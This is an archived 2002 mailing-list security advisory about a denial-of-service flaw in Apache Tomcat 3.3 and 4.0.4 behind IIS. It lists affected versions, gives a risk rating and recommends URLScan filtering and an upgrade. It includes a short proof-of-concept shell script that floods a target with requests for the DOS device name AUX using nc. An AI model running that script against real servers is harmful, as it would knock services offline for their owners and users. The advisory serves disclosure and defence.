[VulnWatch] Apache Tomcat 3.x and 4.0.x: Remote denial-of-service vulnerability

From: Olaf Schulz (olaf.schulz@t-systems.com)
Date: 10/11/02 

Date: Fri, 11 Oct 2002 13:36:55 +0200
From: Olaf Schulz <olaf.schulz@t-systems.com>
To: cert@cert.org, bugtraq@securityfocus.com, vulnwatch@vulnwatch.org

-----BEGIN PGP SIGNED MESSAGE-----

<Title:>
Apache Tomcat: Remote denial-of-service vulnerability

<Date:>
2002-09-06

<State:>
2002-10-11

<Vendor response:>
Vendor contacted on 2002-09-06.
Vendor is verifying the problem since 2002-09-10.
No news since then...

<Operating Systems:>

Microsoft Windows 2000
Microsoft Windows NT may be affected as well.

<Software:>
Apache Tomcat 3.3
Apache Tomcat 4.0.4
All versions prior to 4.1.x may be affected as well.

Apache Tomcat 4.1.10 (and probably higher) is not affected.

<Attack:>
A remote attacker can bring the servlet engine to a standstill.

<Description:>
In combination with Microsoft's IIS, Apache Tomcat is vulnerable to a
denial-of-service attack.
An attacker can crash the tomcat engine with multiple (e.g. 1000)
requests that contain DOS device names like AUX, LPT1, CON, PRN.

Proof of concept code:
When Tomcat is serving servlets and jsp's under /examples/servlet/,
use
:-
- - - - --------8<----------------------------
#!/bin/sh
for i in 1 2 3 4 5 6 7 8 9 0 ; do
  for j in 1 2 3 4 5 6 7 8 9 0 ; do
     for k in 1 2 3 4 5 6 7 8 9 0 ; do
        echo -e "GET /examples/servlet/AUX HTTP/1.0\n\n"|nc
<target_ip>
<target-port> 2>1 >/dev/null &
     done
  done
done
- - - - --------8<----------------------------

This attack works on a Microsoft IIS Web Server connecting the Tomcat
engine via the ajp1.3 connector.
Standalone Tomcat engines (connected via the http interface on port
8080) are not vulnerable.

<Risc:>
Probability of an attack: HIGH
Damage probability: MEDIUM-HIGH

<Recommendation:>
1) Do not use Apache software on Microsoft operating systems.

2) When using Apache with IIS, enable the URLScan Filter to filter
DOS
device names from HTTP Requests.

3) Update to Apache Tomcat 4.1.x

Author: Olaf Schulz
        olaf.schulz@t-systems.com
        http://www.dcert.de

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.3

iQEVAwUBPaanhhAj4oS8JNNNAQGAywgAgbNtMnf54MsqozQsxuJDfR2oU67qUXMf
dMbt7DuyxkRr8sS4+u6vmTvv3v/Da1IfiwlOZcvaRLh+r3+lO1nJUoUZeIVjWW8b
tat0uPKNRxA7b/DJpcQLkohewurDPQlyTV5dJqJpZp6Q8YzRAHIi1WqL4fnZAb6o
fMjIft7MVNs2y/CVpQmofdh4ZTmY0tPdifKIyhxdVBSCpgBES4dZwxX41j9PcHeK
YJpuxm+d6c0PsbbmY5S5BPPBKyg87mQcOHs2bN0JCaxwHoLiXx8zLCQBkhB1xAD7
0y4u8zMXNT5QVqaOeBig+GFackal6b0Qi+8XSDPZRpiJ8kvywz2maQ==
=+2dL
-----END PGP SIGNATURE-----

Relevant Pages

  • NSSI-2002-zonealarm3: ZoneAlarm Pro Denial of Service Vulnerability
    ... Subject: NSSI-2002-zonealarm3: ZoneAlarm Pro Denial of Service ... ZoneAlarm Pro 3.1 and 3.0 Denial of Service Vulnerability ... This vulnerability is confirmed by the vendor. ... Denial of Service Attack through sending multiple syn packets / ...
    (comp.security.firewalls)
  • Re: [Full-disclosure] defining 0day
    ... But from the computers point of view it doesn't care, ... vulnerability is not patched by the official vendor then its still a ... you get exploited via this vector, that is a 0day attack? ...
    (Full-Disclosure)
  • KPMG-2002025: Apache Tomcat Denial of Service
    ... Apache Tomcat 4.0.3 on Windows 2000 Server ... Apache Tomcat 4.1.3 beta on Windows 2000 Server ... installation has 75 working threads, ... You can visit the vendor webpage here: http://jakarta.apache.org ...
    (Bugtraq)
  • KPMG-2002024: Apache Tomcat Path Disclosure
    ... It is possible to disclose the physical path to the webroot. ... Apache Tomcat 4.0.3 on Windows 2000 Server ... You can visit the vendor webpage here: http://jakarta.apache.org ...
    (Bugtraq)
  • Apache Tomcat <= 6.0.18 UTF8 Directory Traversal Vulnerability
    ... Apache Tomcat Directory Traversal Vulnerability ... Hot fix: Disable allowLinking or do not set URIencoding to utf8 in order to avoid this vulnerability. ...
    (Bugtraq)